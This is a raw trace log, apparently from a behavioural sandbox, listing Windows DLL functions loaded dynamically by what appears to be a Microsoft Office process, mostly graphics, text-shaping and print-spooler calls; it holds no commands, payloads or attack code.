DynamicLoader: GdiPlus.dll/GdipCreateRegion
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetClip
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetClipRegion
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipDeleteRegion
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetClipRectI
DynamicLoader: mso.dll/
DynamicLoader: USP10.DLL/ScriptItemize
DynamicLoader: USP10.DLL/ScriptPlace
DynamicLoader: USP10.DLL/ScriptShape
DynamicLoader: USP10.DLL/ScriptItemizeOpenType
DynamicLoader: USP10.DLL/ScriptPlaceOpenType
DynamicLoader: USP10.DLL/ScriptShapeOpenType
DynamicLoader: USP10.DLL/ScriptJustify
DynamicLoader: USP10.DLL/ScriptTextOut
DynamicLoader: USP10.DLL/ScriptCPtoX
DynamicLoader: USP10.DLL/ScriptXtoCP
DynamicLoader: USP10.DLL/ScriptFreeCache
DynamicLoader: USP10.DLL/ScriptCacheGetHeight
DynamicLoader: USP10.DLL/ScriptGetCMap
DynamicLoader: USP10.DLL/ScriptLayout
DynamicLoader: USP10.DLL/ScriptBreak
DynamicLoader: USP10.DLL/ScriptIsComplex
DynamicLoader: USP10.DLL/ScriptGetFontFeatureTags
DynamicLoader: USP10.DLL/ScriptGetFontScriptTags
DynamicLoader: USP10.DLL/ScriptGetFontLanguageTags
DynamicLoader: USP10.DLL/ScriptGetLogicalWidths
DynamicLoader: USP10.DLL/ScriptApplyLogicalWidth
DynamicLoader: USP10.DLL/ScriptGetGlyphABCWidth
DynamicLoader: USP10.DLL/ScriptCacheGetHeight
DynamicLoader: USP10.DLL/ScriptGetGlyphABCWidth
DynamicLoader: USP10.DLL/ScriptGetFontProperties
DynamicLoader: USP10.DLL/ScriptApplyDigitSubstitution
DynamicLoader: USP10.DLL/ScriptRecordDigitSubstitution
DynamicLoader: USP10.DLL/ScriptGetProperties
DynamicLoader: USP10.DLL/ScriptGetFontAlternateGlyphs
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetRegionHRgn
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetDC
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetMatrixElements
DynamicLoader: mso.dll/
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipReleaseDC
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipDeleteBrush
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/NotifyServiceStatusChangeW
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipLoadImageFromStreamICM
DynamicLoader: WindowsCodecs.dll/DllGetClassObject
DynamicLoader: kernel32.dll/WerRegisterMemoryBlock
DynamicLoader: GdiPlus.dll/GdipGetImageRawFormat
DynamicLoader: GdiPlus.dll/GdipGetImageFlags
DynamicLoader: GdiPlus.dll/GdipGetImageWidth
DynamicLoader: GdiPlus.dll/GdipGetImageHeight
DynamicLoader: GdiPlus.dll/GdipGetImagePixelFormat
DynamicLoader: GdiPlus.dll/GdipGetImageHorizontalResolution
DynamicLoader: GdiPlus.dll/GdipGetImageVerticalResolution
DynamicLoader: GdiPlus.dll/GdipImageGetFrameCount
DynamicLoader: GdiPlus.dll/GdipCreateBitmapFromGraphics
DynamicLoader: GdiPlus.dll/GdipGetImageGraphicsContext
DynamicLoader: GdiPlus.dll/GdipTranslateWorldTransform
DynamicLoader: OLEAUT32.dll/
DynamicLoader: GdiPlus.dll/GdipCreateCachedBitmap
DynamicLoader: GdiPlus.dll/GdipDrawCachedBitmap
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/NotifyServiceStatusChangeW
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: msproof7.dll/DllGetClassObject
DynamicLoader: msproof7.dll/DllCanUnloadNow
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: riched20.dll/REMSOHInst
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: CRYPTSP.dll/CryptGenKey
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: MSGR3EN.DLL/CheckVersion
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: MSGR3EN.DLL/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/SetDefaultPrinterW
DynamicLoader: WINSPOOL.DRV/GetDefaultPrinterW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverPackagePathW
DynamicLoader: WINSPOOL.DRV/CorePrinterDriverInstalledW
DynamicLoader: WINSPOOL.DRV/GetCorePrinterDriversW
DynamicLoader: WINSPOOL.DRV/UploadPrinterDriverPackageW
DynamicLoader: WINSPOOL.DRV/InstallPrinterDriverFromPackageW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/AddPrinterConnection2W
DynamicLoader: WINSPOOL.DRV/OpenPrinter2W
DynamicLoader: WINSPOOL.DRV/DeletePrinterKeyW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDataExW
DynamicLoader: WINSPOOL.DRV/EnumPrinterKeyW
DynamicLoader: WINSPOOL.DRV/EnumPrinterDataExW
DynamicLoader: WINSPOOL.DRV/GetPrinterDataExW
DynamicLoader: WINSPOOL.DRV/SetPrinterDataExW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDataW
DynamicLoader: WINSPOOL.DRV/EnumPrinterDataW
DynamicLoader: WINSPOOL.DRV/SpoolerPrinterEvent
DynamicLoader: WINSPOOL.DRV/SetPortW
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: WINSPOOL.DRV/DevicePropertySheets
DynamicLoader: WINSPOOL.DRV/IsValidDevmodeW
DynamicLoader: WINSPOOL.DRV/IsValidDevmodeA
DynamicLoader: WINSPOOL.DRV/AddPortExW
DynamicLoader: WINSPOOL.DRV/DeletePrintProvidorW
DynamicLoader: WINSPOOL.DRV/AddPrintProvidorW
DynamicLoader: WINSPOOL.DRV/DeletePrintProcessorW
DynamicLoader: WINSPOOL.DRV/DeleteMonitorW
DynamicLoader: WINSPOOL.DRV/AddMonitorW
DynamicLoader: WINSPOOL.DRV/StartDocDlgW
DynamicLoader: WINSPOOL.DRV/AdvancedDocumentPropertiesW
DynamicLoader: WINSPOOL.DRV/AdvancedDocumentPropertiesA
DynamicLoader: WINSPOOL.DRV/DocumentPropertiesW
DynamicLoader: WINSPOOL.DRV/DeviceCapabilitiesW
DynamicLoader: WINSPOOL.DRV/DeletePrinterIC
DynamicLoader: WINSPOOL.DRV/PlayGdiScriptOnPrinterIC
DynamicLoader: WINSPOOL.DRV/CreatePrinterIC
DynamicLoader: WINSPOOL.DRV/SetJobW
DynamicLoader: WINSPOOL.DRV/GetJobW
DynamicLoader: WINSPOOL.DRV/EnumJobsW
DynamicLoader: WINSPOOL.DRV/AddPrinterW
DynamicLoader: WINSPOOL.DRV/SetPrinterW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverDirectoryW
DynamicLoader: WINSPOOL.DRV/EnumPrintersW
DynamicLoader: WINSPOOL.DRV/AddPrinterConnectionW
DynamicLoader: WINSPOOL.DRV/DeletePrinterConnectionW
DynamicLoader: WINSPOOL.DRV/AddPrinterDriverExW
DynamicLoader: WINSPOOL.DRV/AddPrinterDriverExA
DynamicLoader: WINSPOOL.DRV/EnumPrinterDriversW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDriverW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDriverExW
DynamicLoader: WINSPOOL.DRV/AddPrintProcessorW
DynamicLoader: WINSPOOL.DRV/EnumPrintProcessorsW
DynamicLoader: WINSPOOL.DRV/GetPrintProcessorDirectoryW
DynamicLoader: WINSPOOL.DRV/EnumPrintProcessorDatatypesW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/SplDriverUnloadComplete
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/OpenPrinterW
DynamicLoader: WINSPOOL.DRV/OpenPrinterA
DynamicLoader: WINSPOOL.DRV/ResetPrinterW
DynamicLoader: WINSPOOL.DRV/StartDocPrinterW
DynamicLoader: WINSPOOL.DRV/FlushPrinter
DynamicLoader: WINSPOOL.DRV/GetPrinterDataW
DynamicLoader: WINSPOOL.DRV/SetPrinterDataW
DynamicLoader: WINSPOOL.DRV/AddJobW
DynamicLoader: WINSPOOL.DRV/ScheduleJob
DynamicLoader: WINSPOOL.DRV/WaitForPrinterChange
DynamicLoader: WINSPOOL.DRV/FindNextPrinterChangeNotification
DynamicLoader: WINSPOOL.DRV/PrinterMessageBoxW
DynamicLoader: WINSPOOL.DRV/ClosePrinter
DynamicLoader: WINSPOOL.DRV/AddFormW
DynamicLoader: WINSPOOL.DRV/DeleteFormW
DynamicLoader: WINSPOOL.DRV/GetFormW
DynamicLoader: WINSPOOL.DRV/SetFormW
DynamicLoader: WINSPOOL.DRV/EnumFormsW
DynamicLoader: WINSPOOL.DRV/EnumPortsW
DynamicLoader: WINSPOOL.DRV/EnumMonitorsW
DynamicLoader: WINSPOOL.DRV/AddPortW
DynamicLoader: WINSPOOL.DRV/ConfigurePortW
DynamicLoader: WINSPOOL.DRV/DeletePortW
DynamicLoader: WINSPOOL.DRV/GetPrinterW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDriverPackageW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: GDI32.dll/GdiPrinterThunk
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: secur32.dll/InitSecurityInterfaceW
DynamicLoader: cryptsp.dll/SystemFunction035
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: unidrvui.dll/DrvResetConfigCache
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/StartDocDlgW
DynamicLoader: WINSPOOL.DRV/OpenPrinterW
DynamicLoader: WINSPOOL.DRV/ResetPrinterW
DynamicLoader: WINSPOOL.DRV/ClosePrinter
DynamicLoader: WINSPOOL.DRV/GetPrinterW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverW
DynamicLoader: WINSPOOL.DRV/EndDocPrinter
DynamicLoader: WINSPOOL.DRV/EndPagePrinter
DynamicLoader: WINSPOOL.DRV/ReadPrinter
DynamicLoader: WINSPOOL.DRV/StartDocPrinterW
DynamicLoader: WINSPOOL.DRV/StartPagePrinter
DynamicLoader: WINSPOOL.DRV/AbortPrinter
DynamicLoader: WINSPOOL.DRV/DocumentEvent
DynamicLoader: WINSPOOL.DRV/QuerySpoolMode
DynamicLoader: WINSPOOL.DRV/QueryRemoteFonts
DynamicLoader: WINSPOOL.DRV/SeekPrinter
DynamicLoader: WINSPOOL.DRV/QueryColorProfile
DynamicLoader: WINSPOOL.DRV/SplDriverUnloadComplete
DynamicLoader: WINSPOOL.DRV/DocumentPropertiesW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/IsValidDevmodeW
DynamicLoader: WINSPOOL.DRV/GetSpoolFileHandle
DynamicLoader: WINSPOOL.DRV/CommitSpoolData
DynamicLoader: WINSPOOL.DRV/CloseSpoolFileHandle
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: mxdwdrv.dll/DrvEnableDriver
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: prntvpt.dll/PTOpenProvider
DynamicLoader: prntvpt.dll/PTCloseProvider
DynamicLoader: prntvpt.dll/PTConvertDevModeToPrintTicket
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
